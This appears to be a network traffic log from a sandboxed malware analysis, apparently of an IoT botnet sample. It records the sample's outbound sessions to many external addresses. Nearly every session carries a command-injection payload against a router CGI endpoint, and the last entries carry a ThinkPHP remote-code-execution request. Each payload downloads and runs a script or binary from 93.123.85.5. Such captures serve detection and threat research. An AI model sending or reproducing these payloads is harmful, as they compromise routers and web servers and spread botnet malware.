                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              926192.168.2.235981631.136.90.2188080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:25.586144924 CET18038OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:26.594270945 CET18159OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:28.578072071 CET18405OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:32.577491045 CET18903OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:40.512496948 CET19891OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:56.382504940 CET20689OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:29.146044970 CET20715OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              927192.168.2.234298231.200.45.278080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:25.608364105 CET18039OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              928192.168.2.234710094.120.103.2538080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:25.619127989 CET18040OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              929192.168.2.233320894.187.114.638080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:26.261821032 CET18152OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              93192.168.2.235612294.103.207.458080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.128644943 CET3056OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:24.457763910 CET3073INHTTP/1.0 200 OK
                                                              Server: httpd/2.0
                                                              Date: Mon, 13 Nov 2023 21:18:20 GMT
                                                              Content-Type: text/html
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 3f 65 72 72 6f 72 5f 73 74 61 74 75 73 3d 31 26 70 61 67 65 3d 69 6e 64 65 78 2e 61 73 70 26 6c 6f 63 6b 5f 74 69 6d 65 3d 30 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp?error_status=1&page=index.asp&lock_time=0';</script></HEAD></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              930192.168.2.235969694.183.164.498080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:26.373013020 CET18155OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              931192.168.2.234050031.136.100.1748080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:26.588722944 CET18158OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:27.586189985 CET18280OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:29.569896936 CET18522OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:33.601378918 CET19019OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.536268950 CET20008OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:57.406424999 CET20691OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:29.146048069 CET20715OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              932192.168.2.234378831.136.229.2508080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:26.588865042 CET18158OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:27.586170912 CET18280OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:29.569900036 CET18521OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:33.603409052 CET19019OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.536283970 CET20008OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:57.406425953 CET20691OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:29.146029949 CET20714OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              933192.168.2.234546094.121.28.2508080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:26.723387003 CET18244OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              934192.168.2.234396488.221.159.8880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:26.929909945 CET18255OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:27.082849026 CET18271INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:20:26 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:26 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 38 34 64 64 62 31 37 26 23 34 36 3b 31 36 39 39 39 31 30 34 32 36 26 23 34 36 3b 32 37 33 39 32 33 31 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;884ddb17&#46;1699910426&#46;27392313</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              935192.168.2.233667088.99.195.15580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:27.083884954 CET18272OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:27.389899015 CET18277INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:33:40 GMT
                                                              Connection: close
                                                              Content-Length: 311
